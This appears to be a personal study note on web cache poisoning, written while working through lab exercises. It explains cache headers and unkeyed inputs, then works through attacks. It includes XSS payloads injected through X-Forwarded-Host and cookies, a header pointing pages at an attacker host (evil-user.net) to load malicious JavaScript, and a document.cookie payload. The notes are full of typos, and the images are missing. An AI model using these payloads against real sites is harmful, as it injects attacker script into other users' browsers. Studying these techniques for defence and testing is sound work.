# Web Cache Poisoning ###### `webSecurity` `cachePoisoning` [TOC] # Introduction & principle Web catch is a technique Attacker will find out the method to induce the back-end server response contain the malicious payload, which can attack other user who subsequently retrieve response.  2018->Practical Web Cache Poisoning 2020->"Web Cache Entanglement: Novel Pathways to Poisoning" ## Web Cache work https://nitropack.io/blog/post/web-caching-beginners-guide Web caching can be defined as the process of storing copies of websites in different locations, known as web caches. ### Cache HIT - When a request retrieves data from the web cache, it's referred to as a "cache hit." ### Cache Miss - When the cache is unable to fulfill the request, it's called a "cache miss."  ## Cache Type ### Browser Caches (Private Cache )  Private cache store on user's device. ### Proxy Server Caches (Public Cache) Proxy servers are typically maintained by ISPs or Content Delivery Network (CDN) providers. CDN  CDN providers use managed panels to monitor and configure a proxy server across the world. ## Cache Header When it comes to web caching, headers play a crucial role in controlling cache behavior.  ### Expires Header  ### Cache-Control Header `no-store`:This directive instructs the web cache not to store any response `no-cache` It tells the web cache that it must validate the cached content with the original server before serving it to the user.  `max-age` max-age decides how long the resource can be considered fresh before it needs to be re-downloaded or revalidated with the origin server. For example, `max-age=31536000` is the maximum value, which equals 1 year. `private` the response only can be stored on the private cache (browser cache) `public` the response can be stored in any intermediate cache, including proxy caches. `must-revalidate` The `must-revalidate` directive enforces revalidation. ## Cache Freshness and Validation In fact. the HTTP response usually set max-age =60 It allows the web cache can provide the response without connecting the back-end server.(unless there's a not-cache rule in place) Validation The web cache will ask the back-end server, if the temp store reponse is expire but it hash value is same the content and can i sent to the user expire reponse ?  ### Validate header #### Last-modified and if-modified-since  Last-modifed header allows put the validator in the initial response and then, web cache will send the request include if-modifed-since ask the orign server the resource havn't been updated  #### Etag (Entity Tag) An ETag is like a unique fingerprint for specific version of a resource. When initial response is store in the web cache. After the web cache save the ETAG, it can can send the request to the back-end systems with `if-none-header` header. This header allow the cache if its ETag matches the ETag of the server. ### Cache key Cache key is pre-defined subset of the reqeust components. The pre-defined subset typically contian the reqeust url and the HTTP header. if the part of the reqeust that is not include in the cache key are said to be "unkeyed". ==Important== the web cache will ignore the other part of the request, excluding reqeuest path and headers) # Poison cache Impact The Impact of web cache attack dependent on the two factor. 1. the nature of malicious payload that can be store in the cache. Web acache is not a independent, it offen need to combine with other attack, such as inject attacks. 2. How many traffic on the web page We can write script to send malicious content repeatedly. Avoid malicious cache is expire --- # Construct Attack flow ## Identify First step: identifying the "unkeyed" part of the request We can inject malicious input unkeyed input fields and observing the resulting variations in responses. Unkeyed part is our inject point! ## Param Miner (Automatically Discovery Inject point) A parameter miner can be employed to automate the identification of unkeyed inputs,  >**Caution:** it is important to make sure that our requests all have a unique cache key so that they will only be served to us. ### Cache bruster A cache buster is technique used in cache poisoning testing to ensure each request includes a unique parameter makes the request unique. This unique request avoid interference with regular user of online website. Example: ``` GET /?meow=1 HTTP/2 ``` ## Obtaining Malicious Response form the back-end systems When the user input didn't property sanitized, can trigger the harmful payload in the response, then this is a potential entry point for web cache poisoning ## Get the malicious response from web cache After we have sucessfuly trigger harmful response by manipulating inputs, the next steps is to ensure the harmful response is stored in the web cache. ### Factors affecting the imapct of storing reponse in the web cache - File Extension - Content Type - Route - Status Code - Respone Header  Understanding and controlling these factors is crucial when dealing with web cache poisoning vulnerabilities. # Exploit ## web cache poisoning Arise flaws in the web design itself. Other times, it occurs because the website has been designed in a way that interacts with the web cache in a particular manner. ## Delivering the XSS payload if the response have to fetch the value of dynamic header. there is a chance to manipulate the header value to cause the cache poisoning ### X-forwarded-Host The X-forwarded-Host typically used to record initial domain name, providing the basic domain information for web applications. Example: ``` X-Forwarded-Host: meowhecker.com (request host domain) ``` Xss payload (Reflect~) ``` GET /en?region=uk HTTP/1.1 Host: innocent-website.com X-Forwarded-Host: a."><script>alert(1)</script>" ``` Obtaining A harmful response from the server ``` HTTP/1.1 200 OK Cache-Control: public <meta property="og:image" content="https://a."><script>alert(1)</script>"/cms/social.png" /> ``` It allow Attacker execute arbitrary Javascript in Victim's browser. ## Exploit unsafe handling of resource imports ``` GET / HTTP/1.1 Host: innocent-website.com X-Forwarded-Host: evil-user.net User-Agent: Mozilla/5.0 Firefox/57.0 HTTP/1.1 200 OK <script src="https://evil-user.net/static/analytics.js"></script> ``` ## LAB-Web cache poisioning with an unkeyed header Cache miss(First Request)  Cache Hit  ---     ``` X-Forwarded-Host: zwrtxqvav5xuq82tt3 ```   Create the Malisiout server replace malisiout js file   Posint the web cache cache miss -> cache hit (the response successfuly store in the cache)   ## Exploit cookie Header (unkey) Suppose: if cache key contain the reqeust line and HTTP header, but not the cookie header. it's possible to resulting in cache posion! ``` GET /blog/post.php?mobile=1 HTTP/1.1 Host: innocent-website.com User-Agent: Mozilla/5.0 Firefox/57.0 Cookie: language=pl; Connection: close ``` ## LAB-Web cache poisoning with an unkeyed cookie Analysis:    In this situation, there probably have a reflected XSS  Xss payload ``` fehost=123"-alert('meowhecker')-"456 ```      ## Exploit-Multiple Headers ``` GET /random HTTP/1.1 Host: innocent-site.com X-Forwarded-Proto: http HTTP/1.1 301 moved permanently Location: https://innocent-site.com/random ``` X-Forwarded -> Elastic load blance -> host: record client IP -> proto: record using protocol between client and load balance or proxy -> port: record client port ## LAB web cache poisoning with multiple headers       ``` X-Forwarded-Scheme: nothttps X-Forwarded-Host: /exploit-0adf000603bd28f68192fb5301c900c3.exploit-server.net ```  --- ## Exploiting response that expose too much information ## Cache-control header analysis To ensure the harmful response is stored the web cache, we can attempt to observer the response of Cache-Control Header. Example: ``` Cache-control: public max-age=30 or cache: miss cache: Hit ``` we can advantage of this information to construct the attack ofcuse on single user or specific group user. Example ``` User-Agent: ``` it allow us to posion spcific user agents or devices which could raise suspicions, the attacker can carefully time a single malicious request to poison the cache. ### Vary Header Varay Header is used to crate the cache key ``` vary: 'header-name', 'header-name' vary: 'User-Agent' ``` ## LAB Target web cache poisoning using know header     ``` X-Host: ``` ---     --- Get the spcific user agnet Not Work !! (是超九 ``` document.write('<img src="https://exploit-0ab4006a04fc7d248103f11101fc00c4.exploit-server.net/test" onerror =alert("trigger ")>meowwwwwwwwwwwwwwwwwwwwwww); alert(document.cookie); ```  Victim 沒辦法吃的posion response 是很正常 因為 User-agent 在cache key 中 (Vary: Usuer-Agent) --- Html injection in comment block  paylaod ``` <img src=https://exploit-server.net></img> ```   ``` Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 ``` ``` GET / HTTP/1.1 .... X-Host: exploit-0adf0073032ca21f89b36d5f01fa00fa.exploit-server.net ... User-Agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 ```   --- ## Exploit DOM-Based vulnerability (skip->CORS!!) ##